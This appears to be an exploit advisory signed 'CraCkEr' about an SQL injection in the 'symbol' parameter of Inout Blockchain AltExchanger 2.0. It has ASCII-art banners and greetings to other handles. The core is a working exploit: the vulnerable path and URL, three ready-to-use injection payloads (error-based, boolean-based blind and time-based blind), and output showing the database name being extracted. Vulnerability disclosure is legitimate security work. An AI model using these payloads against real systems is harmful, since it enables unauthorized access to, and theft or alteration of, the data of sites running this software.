┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ │ │ Vendor : Inout Scripts │ │ Software : Inout Blockchain AltExchanger 2.0 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /application/third_party/Chart/TradingView/chart_content/master.php/history https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203 GET parameter 'symbol' is vulnerable to SQL Injection --- Parameter: symbol (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: symbol=ZRX-BTC') AND 06585=6585 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_altexchanger_***' [-] Done